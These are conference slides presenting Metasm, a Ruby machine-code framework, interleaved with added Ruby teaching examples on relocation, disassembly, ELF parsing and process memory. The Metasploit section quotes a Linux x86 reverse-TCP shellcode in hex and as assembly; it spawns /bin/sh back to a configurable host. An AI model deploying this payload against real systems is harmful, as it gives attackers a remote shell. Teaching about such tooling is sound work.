Metasm

a ruby (dis)assembler

Yoann Guillot

20 October 2007

Presentation

I am Yoann Guillot
I work for Sogeti/ESEC in the security R&D lab

Metasm HACK.LU 2007 2 / 23


Plan

1 Metasm
Architecture overview
Assembly
Disassembly
Executable file handling
C compiler
Live process interaction
Use cases
Metasploit 3

2 Demonstrations
Introduction

Metasm is a full-Ruby standalone framework
  to manipulate machine code (static or dynamic)
  multi-CPU (Ia32/MIPS for now)
  multi-OS (Windows/Linux)
distributed under the open-source LGPL license
  http://metasm.cr0.org/
still under heavy development

Architecture overview

Assembly

EncodedData represents a relocatable binary string
  binary data
  arbitrary relocations
  exports
  virtual size
used to dissociate assembly from linking

Assembly

mov eax, dword ptr [toto]
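The two Assembly slides above (EncodedData, and the instruction that references an undefined label) are illustrated by the following added example. It is not Metasm's own code: it is a small stand-in for EncodedData written for this page, with its own class and method names (RelocBlob, add_reloc, fixup), showing what a relocatable binary string buys you. Assembling `mov eax, dword ptr [toto]` with `toto` undefined yields bytes plus a relocation record instead of an error (in 32-bit Ia32 code that instruction encodes as A1 followed by a 32-bit address); linking appends another blob and shifts its relocations and exports; fixup resolves the records once addresses are known.

```ruby
# Added example, not Metasm's own code: a minimal stand-in for EncodedData.
# Class and method names are this example's own. The sample instruction is
# the slide's `mov eax, dword ptr [toto]`, which encodes as A1 <addr32>.

Reloc = Struct.new(:offset, :type, :target)

class RelocBlob
  # relocation kinds: 32/16-bit little-endian, and 16-bit network order
  # (the 'n' kind Metasploit's Offsets table used for ports)
  PACK = { u32: ['V', 4], u16: ['v', 2], n16: ['n', 2] }.freeze

  attr_reader :data, :reloc, :export, :virtsize

  def initialize(data = ''.b, virtsize = nil)
    @data = data.b
    @reloc = {}                               # offset => Reloc
    @export = {}                              # label  => offset
    @virtsize = virtsize || @data.bytesize    # may exceed data (uninitialised space)
  end

  def add_reloc(offset, type, target)
    PACK.fetch(type)                          # fail early on unknown kinds
    @reloc[offset] = Reloc.new(offset, type, target)
    self
  end

  def add_export(label, offset = @data.bytesize)
    @export[label] = offset
    self
  end

  # Linking step: append another blob, shifting its relocations and exports
  # by our current virtual size so its labels stay meaningful.
  def <<(other)
    base = @virtsize
    @data << ("\0".b * (base - @data.bytesize)) << other.data
    other.reloc.each_value { |r| @reloc[r.offset + base] = Reloc.new(r.offset + base, r.type, r.target) }
    other.export.each { |label, off| @export[label] = off + base }
    @virtsize = base + other.virtsize
    self
  end

  # Resolve every relocation whose target is known: labels exported by the
  # blob itself resolve to base_addr + offset, the rest come from `bind`.
  # Relocations still unknown are kept, so fixup can run again later.
  def fixup(bind = {}, base_addr = 0)
    known = @export.transform_values { |off| base_addr + off }.merge(bind)
    @reloc.delete_if do |off, r|
      next false unless known.key?(r.target)
      fmt, size = PACK.fetch(r.type)
      raise "relocation at +#{off} lies outside the data" if off + size > @data.bytesize
      @data[off, size] = [known[r.target]].pack(fmt)
      true
    end
    self
  end

  def unresolved
    @reloc.each_value.map(&:target).uniq
  end
end

# "Assembling" the slide's instruction with toto undefined: the 4-byte
# address field becomes a relocation instead of an error.
def assemble_mov_eax_toto
  RelocBlob.new("\xa1\x00\x00\x00\x00".b).add_reloc(1, :u32, 'toto')
end

# A data blob that defines toto (a 32-bit value) so the two can be linked.
def assemble_toto_data
  RelocBlob.new([0x1234].pack('V')).add_export('toto', 0)
end

# Link code + data and fix up at a load address; toto ends up at base + 5.
def link_and_fixup(base_addr = 0x08048000)
  blob = assemble_mov_eax_toto
  blob << assemble_toto_data
  blob.fixup({}, base_addr)
end

if $0 == __FILE__
  blob = link_and_fixup
  puts blob.data.unpack1('H*')
  puts "unresolved: #{blob.unresolved.inspect}"
end
```

Running it prints `a10580040834120000`: the A1 opcode, the resolved address 0x08048005 in little-endian order, then the 4-byte `toto` value; nothing stays unresolved. Calling `fixup` on the code blob alone leaves the relocation pending, which is exactly the state a separate linking step expects.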

Disassembly

simple yet powerful backtracking engine
  emulates standard CPU instructions
  follows the code flow precisely
currently unfinished
  trace data access
  handle subfunctions
  handle external API calls
minimal arch-specific development
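As an added illustration of the backtracking idea on this slide (not Metasm's code, and not a real CPU's encoding), here is a toy recursive-traversal disassembler. It follows the code flow from an entry point, never decoding bytes no path reaches, and when it meets an indirect jump through a register it walks back through the predecessors, emulating `add` and stopping at the `mov` that wrote the register. The byte code, opcodes, register numbering and sample programs are all invented for this example.

```ruby
# Added example, not Metasm's own code: a toy disassembler whose indirect
# jumps are resolved by backtracking over the instructions that set the
# register. The encoding below is invented for this example.

class ToyDisasm
  Insn = Struct.new(:addr, :op, :reg, :imm, :len, :targets)

  # opcode => [mnemonic, operand layout]; :imm32 little-endian, :rel8 signed
  OPS = {
    0x00 => [:nop, []],
    0x01 => [:mov, [:reg, :imm32]],    # mov reg, imm32
    0x02 => [:jmp_reg, [:reg]],        # jmp reg (indirect)
    0x03 => [:jmp, [:rel8]],           # jmp rel8
    0x04 => [:ret, []],
    0x05 => [:add, [:reg, :imm32]],    # add reg, imm32
    0x06 => [:jz, [:rel8]],            # conditional: two successors
  }.freeze
  SIZE = { reg: 1, imm32: 4, rel8: 1 }.freeze

  attr_reader :insns, :unresolved

  def initialize(code)
    @code = code.b
    @insns = {}                               # addr => Insn
    @preds = Hash.new { |h, k| h[k] = [] }    # addr => addrs flowing into it
    @unresolved = []                          # indirect jumps left unresolved
  end

  def decode(addr)
    op = @code.getbyte(addr) or return nil
    mnem, layout = OPS.fetch(op) { return nil }
    len = 1 + layout.sum { |k| SIZE[k] }
    return nil if addr + len > @code.bytesize
    insn = Insn.new(addr, mnem, nil, nil, len, [])
    pos = addr + 1
    layout.each do |kind|
      case kind
      when :reg   then insn.reg = @code.getbyte(pos)
      when :imm32 then insn.imm = @code[pos, 4].unpack1('V')
      when :rel8  then insn.imm = @code[pos, 1].unpack1('c')
      end
      pos += SIZE[kind]
    end
    insn
  end

  # Follow the code flow from `entry`; bytes no path reaches stay undecoded.
  def disassemble(entry)
    todo = [[entry, nil]]
    until todo.empty?
      addr, from = todo.pop
      @preds[addr] << from if from
      next if @insns[addr]
      insn = decode(addr) or next
      @insns[addr] = insn
      nxt = addr + insn.len
      case insn.op
      when :ret then next
      when :jmp then insn.targets = [nxt + insn.imm]
      when :jz  then insn.targets = [nxt, nxt + insn.imm]
      when :jmp_reg
        tgt = backtrace(addr, insn.reg)
        unless tgt
          @unresolved << addr
          next
        end
        insn.targets = [tgt]
      else insn.targets = [nxt]
      end
      insn.targets.each { |t| todo << [t, addr] }
    end
    self
  end

  # Walk backwards from `addr` to the last write to `reg`, emulating `add`
  # on the way. Gives up when the flow is ambiguous (several predecessors)
  # or when the entry point is reached without a write.
  def backtrace(addr, reg, depth = 32)
    addend = 0
    cur = addr
    depth.times do
      preds = @preds[cur].uniq
      return nil unless preds.size == 1
      cur = preds.first
      insn = @insns[cur]
      next unless insn.reg == reg
      case insn.op
      when :mov then return insn.imm + addend
      when :add then addend += insn.imm
      end
    end
    nil
  end
end

# Constructed sample program (bytes invented for this example).
SAMPLE = [
  0x01, 0x01, 0x10, 0x00, 0x00, 0x00,   # 0x00 mov r1, 0x10
  0x05, 0x01, 0x04, 0x00, 0x00, 0x00,   # 0x06 add r1, 4
  0x02, 0x01,                           # 0x0c jmp r1   -> 0x14 after backtracking
  0x00, 0x04, 0xff, 0xff, 0xff, 0xff,   # 0x0e unreachable bytes, never decoded
  0x06, 0x01,                           # 0x14 jz +1    -> 0x16 or 0x17
  0x04,                                 # 0x16 ret
  0x00,                                 # 0x17 nop
  0x04,                                 # 0x18 ret
].pack('C*')

# Same jump, but r1 is written on only one of the two paths reaching it.
AMBIGUOUS = [
  0x06, 0x06,                           # 0x00 jz +6    -> 0x02 or 0x08
  0x01, 0x01, 0x20, 0x00, 0x00, 0x00,   # 0x02 mov r1, 0x20
  0x02, 0x01,                           # 0x08 jmp r1   -> cannot be resolved
].pack('C*')

def decoded_addrs(code, entry = 0)
  ToyDisasm.new(code).disassemble(entry).insns.keys.sort
end

if $0 == __FILE__
  d = ToyDisasm.new(SAMPLE).disassemble(0)
  d.insns.sort.each { |a, i| puts format('%04x  %-8s %s', a, i.op, [i.reg, i.imm].compact.join(', ')) }
  puts "unresolved: #{ToyDisasm.new(AMBIGUOUS).disassemble(0).unresolved.inspect}"
end
```

In the first program the jump at 0x0c is resolved to 0x14 (0x10 from the `mov`, plus 4 from the `add`), so the six dead bytes at 0x0e are never decoded; in the second the jump stays in `unresolved`, which is the signal a real engine uses to fall back to per-path backtracking or to ask the user.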

Handling executable files

reading
  from a file
  directly in memory
writing
  from scratch
  patch an existing exe
currently supported formats: MZ / PE / COFF, ELF / a.out
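To make the "reading from a file / directly in memory" point concrete, here is an added example (not Metasm's own code) of a minimal ELF32 header reader. It accepts a path or a byte string already in memory and honours the byte order declared in e_ident, which is what makes the big-endian MIPS binaries of the later demo readable. Field layout and constants follow the ELF specification; the sample header is constructed for this example and is not taken from any real binary.

```ruby
# Added example, not Metasm's own code: an ELF32 header parser that reads
# from a file or from bytes in memory and respects EI_DATA (byte order).

class Elf32Header
  MAGIC = "\x7fELF".b
  HEADER_SIZE = 52
  MACHINES = { 3 => 'x86', 8 => 'MIPS', 40 => 'ARM', 62 => 'x86-64' }.freeze
  TYPES = { 1 => 'REL', 2 => 'EXEC', 3 => 'DYN', 4 => 'CORE' }.freeze
  # fields after the 16-byte e_ident, in order
  FIELDS = %w[e_type e_machine e_version e_entry e_phoff e_shoff e_flags
              e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx].freeze
  # two u16, five u32, six u16: 36 bytes, little- or big-endian
  FMT = { little: 'vvVVVVVvvvvvv', big: 'nnNNNNNnnnnnn' }.freeze

  attr_reader :fields, :endian

  def self.from_file(path)
    new(File.binread(path, HEADER_SIZE))
  end

  def initialize(bytes)
    raw = bytes.b
    raise ArgumentError, 'not an ELF file' unless raw[0, 4] == MAGIC
    raise ArgumentError, 'not an ELF32 file' unless raw.getbyte(4) == 1   # EI_CLASS
    @endian = { 1 => :little, 2 => :big }.fetch(raw.getbyte(5)) do        # EI_DATA
      raise ArgumentError, 'invalid EI_DATA'
    end
    values = raw[16, 36].to_s.unpack(FMT[@endian])
    raise ArgumentError, 'truncated header' if values.any?(&:nil?)
    @fields = FIELDS.zip(values).to_h
  end

  def machine
    MACHINES.fetch(fields['e_machine']) { "unknown(#{fields['e_machine']})" }
  end

  def type
    TYPES.fetch(fields['e_type']) { "unknown(#{fields['e_type']})" }
  end

  def entry
    fields['e_entry']
  end

  # Checks a loader or a patcher wants before trusting the table offsets.
  def sane?
    fields['e_ehsize'] == HEADER_SIZE &&
      (fields['e_phnum'].zero? || fields['e_phentsize'] == 32) &&
      (fields['e_shnum'].zero? || fields['e_shentsize'] == 40)
  end
end

# Constructed sample: big-endian MIPS ELF32 executable, entry 0x00400100,
# one program header right after the ELF header, no section headers.
def sample_mips_header
  ident = Elf32Header::MAGIC + [1, 2, 1, 0, 0].pack('C*') + ("\0".b * 7)  # ELF32, MSB, v1, SYSV ABI
  ident + [2, 8, 1, 0x00400100, 52, 0, 0, 52, 32, 1, 40, 0, 0].pack('nnNNNNNnnnnnn')
end

if $0 == __FILE__
  h = Elf32Header.new(sample_mips_header)
  puts "#{h.machine} #{h.type}, #{h.endian}-endian, entry 0x#{h.entry.to_s(16)}, sane=#{h.sane?}"
end
```

The same class serves both slide bullets: `Elf32Header.from_file(path)` reads the first 52 bytes from disk, while `Elf32Header.new(bytes)` works on a buffer you already hold, for instance one read out of a running process. A wrong magic, a 64-bit file or a truncated buffer raises ArgumentError rather than yielding garbage field values.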

C Compilation

Metasm includes a complete C parser
  features header filtering
basic compiler for Ia32

Live process interaction

String-like process memory abstraction
  transparent read/write
Ruby objects wrap the host OS debug API
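The string-like abstraction on this slide, as an added example that is not Metasm's code: a small Ruby class over a pluggable backend that only knows how to read and write whole pages (the shape a debug API such as ptrace or ReadProcessMemory gives you). Reads are served from a page cache and can span page boundaries; writes go through to the backend and update the cache. The backend used here is an in-memory fake built for the demo, not a real process, and the class and method names are this example's own.

```ruby
# Added example, not Metasm's own code: process memory exposed with
# String#[] / String#[]= semantics over a page-granular backend.

class VirtualString
  PAGE = 4096

  def initialize(backend)
    @backend = backend
    @cache = {}      # page address => page contents
  end

  # mem[addr, len] like String#[]; returns nil if any page is unmapped.
  def [](addr, len = 1)
    out = ''.b
    while len > 0
      loc = locate(addr) or return nil
      page, off = loc
      chunk = [PAGE - off, len].min
      out << page[off, chunk]
      addr += chunk
      len -= chunk
    end
    out
  end

  # mem[addr, len] = str / mem[addr] = str; write-through, page by page.
  def []=(addr, *args)
    str = args.pop.b
    raise ArgumentError, 'length mismatch' if args[0] && args[0] != str.bytesize
    pos = 0
    while pos < str.bytesize
      loc = locate(addr) or raise "unmapped address 0x#{addr.to_s(16)}"
      page, off = loc
      chunk = [PAGE - off, str.bytesize - pos].min
      page[off, chunk] = str[pos, chunk]
      @backend.write_page(addr & ~(PAGE - 1), page)
      addr += chunk
      pos += chunk
    end
    str
  end

  private

  # Returns [cached page, offset in page], or nil when the page is unmapped.
  def locate(addr)
    pg = addr & ~(PAGE - 1)
    page = (@cache[pg] ||= @backend.read_page(pg)) or return nil
    [page, addr - pg]
  end
end

# Constructed fake process: two adjacent mapped pages, so that a read
# spanning 0x1fff/0x2000 exercises the page-splitting logic.
class FakeProcessMemory
  attr_reader :page_writes

  def initialize
    @pages = { 0x1000 => "\0".b * VirtualString::PAGE, 0x2000 => "\0".b * VirtualString::PAGE }
    @pages[0x1000][0xffc, 4] = 'ABCD'.b
    @pages[0x2000][0, 4] = 'EFGH'.b
    @page_writes = 0
  end

  def read_page(pg)
    @pages[pg]&.dup     # nil for an unmapped page, a copy otherwise
  end

  def write_page(pg, data)
    raise "unmapped page 0x#{pg.to_s(16)}" unless @pages.key?(pg)
    @pages[pg] = data.dup
    @page_writes += 1
  end
end

def demo_virtual_string
  backend = FakeProcessMemory.new
  mem = VirtualString.new(backend)
  before = mem[0x1ffc, 8]              # "ABCDEFGH", spans both pages
  mem[0x1ffe, 4] = 'wxyz'              # two bytes land on each page
  {
    before: before,
    after: mem[0x1ffc, 8],             # "ABwxyzGH", served from the cache
    fresh_view: VirtualString.new(backend)[0x1ffc, 8],  # uncached reader sees the write
    unmapped: mem[0x5000, 4],          # nil: nothing mapped there
    page_writes: backend.page_writes,  # 2: one write per touched page
  }
end
```

Swapping FakeProcessMemory for an object whose read_page/write_page call the real debug API is all that changes for a live process; the rest of the code keeps treating memory as a string.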

When is it useful?

whenever you want to manipulate machine code or executable files
it's easy to hook/rewrite/customize any internal method

Metasploit 3 - before

Metasploit 3 is also written in Ruby
  it had very bad machine code support
  hexadecimal static shellcodes
  hacks to patch the shellcodes with user-specified values
  more hacks to link stages

Metasploit 3 - before
[metasploit3/.../reverse_tcp.rb]

'Payload' =>
  {
    'Offsets' =>
      {
        'LHOST' => [ 0x1a, 'ADDR' ],
        'LPORT' => [ 0x20, 'n' ],
      },
    'Payload' =>
      "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +
      "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" +
      "\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +
      "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
      "\x89\xe1\xb0\x0b\xcd\x80"
  }

Metasploit 3 - now
[metasploit3/.../reverse_tcp2.rb]

'Payload' => {
  'Offsets' => {
    'LHOST' => [ 0, 'ADDR' ],
    'LPORT' => [ 0, 'n' ],
  },
  'Assembly' => <<EOS
xor ebx, ebx        ; @00000000 31db
[...]
pop edx             ; @00000018 5a
push LHOST          ; @00000019 687f000001
push.i16 LPORT      ; @0000001e 6668bfbf
[...]
push '//sh'
push '/bin'
[...]
mov al, 0bh         ; @00000042 b00b
int 80h             ; @00000044 cd80
EOS
}

Metasploit 3 - now

Metasm is now included in Metasploit
  shellcodes can be in source form
  standard Metasm relocation handling may be used for shellcode patching/linking
  ???
  Profit !

Plan

1 Metasm

2 Demonstrations
metasm-shell
Exe manipulation
Live process interaction

metasm-shell

metasm-shell
  adds metasm methods to standard Ruby Strings
  offers an interactive assembler shell

Exe manipulation

reading a MIPS ELF
compiling a simple PE [samples/testpe.rb]
patching a PE [samples/pe-hook.rb]

Windows process hooking

simple IAT hook [samples/win32hooker.rb]
full-library hook [samples/win32hooker-advanced.rb]
  redirect all exported functions to a custom hook

Linux debugging

ptrace wrapper [samples/rubstop.rb]
  singlestep, stepover, etc.
  memory access
  PaX compatible
UI [samples/lindebug.rb]
  console-mode only (for now)

Conclusion

Thanks for listening

Questions?
